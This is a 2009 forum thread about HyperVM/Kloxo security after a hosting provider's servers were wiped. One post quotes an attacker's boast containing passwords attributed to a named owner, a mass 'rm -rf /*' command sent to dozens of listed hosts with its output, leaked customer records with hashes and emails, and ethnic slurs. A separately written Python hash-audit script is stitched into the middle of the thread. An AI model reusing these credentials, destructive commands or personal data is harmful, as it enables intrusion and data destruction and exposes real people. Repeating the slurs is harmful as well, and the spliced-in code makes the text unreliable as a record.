Re: Multiple Security Issues in hyperVM/Kloxo [message #67713 is a reply to message #67701]
Tue, 09 June 2009 19:33
grk519 wrote on Tue, 09 June 2009 17:53:
> HyperVM will stop working and tell you that you have exceeded vps_num -- which is 5 VPS.
> So if you have more than 5 VPS and the licensing server fails HyperVM is useless.
> EDIT: not sure about kloxo.
Not correct.
You will be fine so long as you don't run /script/upcp or 'update license', so I recommend not doing either until we are informed about what will happen to the license server.
Re: Multiple Security Issues in hyperVM/Kloxo [message #67765 is a reply to message #67091]
Wed, 10 June 2009 07:54
Hello,
Please read this post on WHT -
www.webhostingtalk.com/showpost.php?p=6229471&postcount=214
His father and uncle are most probably employing new developers to continue LxLabs. If that is the case, in 2 weeks we will be able to see some results and can decide upon the continued use of Kloxo/HyperVM.
I wish that the great work done by Ligesh is continued forever.
Regards
Any mods around, please make this sticky. It would be my greatest pleasure in life to see LxLabs continue, for I respect Ligesh for his hard work, knowledge and his products too.
[Updated on: Wed, 10 June 2009 07:56]
Re: Multiple Security Issues in hyperVM/Kloxo [message #67772 is a reply to message #67091]
Wed, 10 June 2009 08:23
Yes. As the user ganesh-rao on WHT posted, he will be visiting his house on the 15th again. That's when we can expect an update on the situation. Don't know anything about S. Bhargava, but he is active on this forum. I will PM him to discuss further.
Regards
Re: Multiple Security Issues in hyperVM/Kloxo [message #67780 is a reply to message #67091]
Wed, 10 June 2009 08:53
bliss (Senior Member, Messages: 288, Registered: July 2008)
Just something that some of you might be interested in, which I found on my travels.
Quote:
A day after news of a so-called HyperVM 0-day that resulted in 100,000 sites being wiped out on Vaserv, the following information has come to light from an anonymous source:
http://pastebin.com/d258dad41 (removed from their page)
OK people are removing it everywhere, so here is a snippet off the page before it went down
Quote:
Z3r0 day in hypervm?? plz u give us too much credit. If you really really wanna know how you got wtfpwned bitch it was ur own stupidity and excessive passwd reuse. Rus's passwds are
Code:
e2×2%sin0ei unf1shf4rt 3^%3df 1/2=%mod5 f0ster
f0ster being the latest one, quite secure eh bitches? We were in ur networks sniffing ur passwds for the past two months quite funny this openvz crap is we could just get into any VPS we like at any time thanks to ur mad passwds. But we got bored so we decided to initiate operation rmfication and hypervm was a great t00l to do that since it spared us the time of sshing into all ur 200 boxen just to issue rm -rf. Coded a little .pl to do just that, take a look at this eleet output it's mad dawg
Code:
[root@vz-vaserv .ssh]# perl h.pl -user admin -pass ****off -host cp.vaserv.com -cmd 'rm -rf /* 2> /dev/null > /dev/null &'
* Attempting to login using admin / ****off
* Logged in, showtime!
Output for 67.222.156.106
Output for xen3ws.vaserv.com
Output for vz22uk.vaserv.com
Output for xen4ws.vaserv.com
Output for vzspecial5.vaserv.com
Output for xen16.vaserv.com
Output for vz77uk.vaserv.com
Output for 91.186.26.128
Output for xen25.vaserv.com
Output for vz76uk.vaserv.com
Output for vz18tx.vaserv.com
Output for vz75uk.vaserv.com
Output for vz45uk.vaserv.com
Output for vzpent16.vaserv.com
Output for xen1tx.vaserv.com
Output for vz13tx.vaserv.com
Output for vz74uk.vaserv.com
Output for vzspecial8.vaserv.com
Output for xen24.vaserv.com
Output for vz73uk.vaserv.com
Output for rdns1.vaserv.com
Output for vz2tx.vaserv.com
Output for vz17tx.vaserv.com
Output for xen23.vaserv.com
Output for vz72uk.vaserv.com
Output for xen22.vaserv.com
Output for vzruffbuff.vaserv.com
Output for vzmario.vaserv.com
Output for xen21.vaserv.com
Output for vz71uk.vaserv.com
Output for vzspecial7.vaserv.com
Output for vz70uk.vaserv.com
Output for xen20.vaserv.com
Output for vz69uk.vaserv.com
Output for vzspecial6.vaserv.com
Output for vz7uk.vaserv.com
Output for vzspecial4.vaserv.com
Output for vzspecial3.vaserv.com
Output for xen19.vaserv.com
Output for vzspecial2.vaserv.com
Output for vzspecial1.vaserv.com
Output for vzpent3.vaserv.com
output truncated due to massive boxen outputz
[root@vz-vaserv .ssh]# rm -rf /* > /dev/null 2> /dev/null &
[1] 12399
[root@vz-vaserv .ssh]#
Did the same fo ****vps.com after resetting the passwd to hyper ve emz, it was ever so much fun you should try it sometime Rus it's GREAT!
BTW to all the customers we deleted ur loving provider is overselling their crappy 8gb nodez to hell and back, thought you'd like to know, you can also thank ur loving buddy Rus for losing ur data hihi. BTW Rus we still have ur billing system wtfpwned and baqdoored we got shitload of CCz from ur retarded customers thanks a lot buddy. Telling you this cuz we got bored of this ****, it's just too easy and monotonous so patch ur crap, if your too dumb to secure a simple web server my rate is $100/hour or one night with ur sister hauhaiahiaha.
Also wheres ur team Rus? the only ****ers i saw in ur billing sys are Kody, Vlada and u you guys work like ****ing hindus i bet but ur cheap like jews lolz hire some pros like me to help you out manage all those retards VPSs lolololl
Code:
1 1 rghf c32f3310baffcb431875a67196e99ebd Rus F zswlxxoomx@nowmymail.com 0 ,
Edit Delete 3 1 vlada c32f3310baffcb431875a67196e99ebd Vlada Neskovic zswlxxoomx@nowmymail.com 0 ,
Edit Delete 4 1 Kody fde67637d867c52d739931528dd92ef0 Kody Riker zswlxxoomx@nowmymail.com Georgia - server22 space 1slot 1gb 0 ,
See we care about ur privacy and edited ur emailz unlike you who do not care about the privacy of ur retarded customers lol
Code:
Showing rows 0 - 29 (1,361 total, Query took 0.0133 sec)
SELECT *
FROM `tblclients`
LIMIT 0 , 30
Fun stuff think we gonna sell all those emails to some spammers to make some quick bucks lol, and yes their main site was a VPS lolol which is why we got quick access thanks to ur passwd reuse, your awesome Rus.
Yea yea "his IP is:64.79.210.78" here i saved u the trouble lolol
Code:
-bash-3.2# ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:16271 errors:0 dropped:0 overruns:0 frame:0
TX packets:16271 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1114930 (1.0 MiB) TX bytes:1114930 (1.0 MiB)
venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:127.0.0.1 P-t-P:127.0.0.1 Bcast:0.0.0.0 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
RX packets:33396 errors:0 dropped:0 overruns:0 frame:0
TX packets:34122 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4462516 (4.2 MiB) TX bytes:11170841 (10.6 MiB)
venet0:0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:64.79.210.78 P-t-P:64.79.210.78 Bcast:64.79.210.78 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
venet0:1 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:64.79.206.197 P-t-P:64.79.206.197 Bcast:64.79.206.197 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
venet0:2 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:67.223.225.52 P-t-P:67.223.225.52 Bcast:67.223.225.52 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
-bash-3.2# rm -rf /* 2> /dev/null > /dev/null * &
[1] 7643
-bash-3.2#
I love to rm lol bye
~Thedefaced.org
It looks like vaserv may have been hacked due to the owner's lack of password security first, and then HyperVM was used to contact the VPSs from within his systems (just what I read in the above post).
So it does not look like HyperVM was the sole cause of this; I think it just made it easier for the hackers. It seems they have some grudge with the boss of vaserv, Rus.
Hope this info helps.
Regards
Jane
PS would be great if HyperVM continues, it's an amazing piece of software (in the meantime we're thinking of writing a basic panel connected to our billing system directly for basic admin of VPS without HyperVM until this is resolved)
[Updated on: Wed, 10 June 2009 21:50]
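The client-table rows quoted in the post above show two staff accounts carrying the identical 32-character hash, which is exactly the password reuse the attacker says they exploited, and a bare unsalted digest makes that reuse visible to anyone who reads the table. As an added example (not code from this thread, from vaserv or from LxLabs), here is a small audit in the spirit of that observation: it reads rows in a constructed `id status username hash name email` layout modelled on the quoted dump, reports accounts that share a hash, and reports hashes whose length and alphabet match an unsalted MD5 digest. The rows, names, emails and hash values below are made-up sample data, not the real dump.

```python
import re
from collections import defaultdict

# Constructed sample rows (made up, not the quoted dump), one per line:
# id, status, username, password hash, full name (may contain spaces), email.
SAMPLE_ROWS = """\
1 1 alice 5f4dcc3b5aa765d61d8327deb882cf99 Alice Example alice@example.invalid
2 1 bob 5f4dcc3b5aa765d61d8327deb882cf99 Bob Example bob@example.invalid
3 1 carol 2ab96390c7dbe3439de74d0c9b0b1767 Carol Example carol@example.invalid
4 1 dave $2y$10$abcdefghijklmnopqrstuuVVnqG5Kps9AnxFjV2NrWoVdCynMQmxq Dave Example dave@example.invalid
"""

# A bare MD5 digest is 32 lowercase hex characters with no scheme prefix or salt.
MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def parse_rows(text):
    """Split whitespace-separated rows into dicts. The email is taken from the
    end of the line so that a full name containing spaces parses correctly."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:          # blank or malformed line
            continue
        rows.append({
            "id": parts[0],
            "status": parts[1],
            "user": parts[2],
            "hash": parts[3],
            "name": " ".join(parts[4:-1]),
            "email": parts[-1],
        })
    return rows


def shared_hashes(rows):
    """Return {hash: [usernames]} for every hash used by more than one account.
    With an unsalted scheme, identical hashes mean identical passwords."""
    by_hash = defaultdict(list)
    for r in rows:
        by_hash[r["hash"]].append(r["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def unsalted_md5_users(rows):
    """Usernames whose stored hash looks like a bare MD5 hex digest."""
    return [r["user"] for r in rows if MD5_HEX.match(r["hash"])]


def audit(text):
    """Run both checks over a dump and return the findings."""
    rows = parse_rows(text)
    return {
        "shared": shared_hashes(rows),
        "unsalted_md5": unsalted_md5_users(rows),
    }


if __name__ == "__main__":
    report = audit(SAMPLE_ROWS)
    for h, users in report["shared"].items():
        print(f"shared password hash {h[:8]}... used by: {', '.join(users)}")
    print("accounts stored as unsalted MD5:", ", ".join(report["unsalted_md5"]))
```

Run against the sample it reports alice and bob sharing one hash and three accounts stored as bare MD5; the bcrypt-style row is left alone because a salted, prefixed hash neither reveals reuse by comparison nor matches the digest pattern. On a real table the column order would have to be adapted, since the quoted dump carries extra fields after the email.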
Re: Multiple Security Issues in hyperVM/Kloxo [message #68024 is a reply to message #67932]
Sat, 13 June 2009 01:48
Well, look in
/usr/local/lxlabs/hypervm/sbin
It's definitely not PHP; probably one can survive with the binaries for a while, but they have to be analyzed and rewritten if the decode track is chosen.
Someone might be able to recognize these tools from somewhere else..
But there is a high risk that some are proprietary.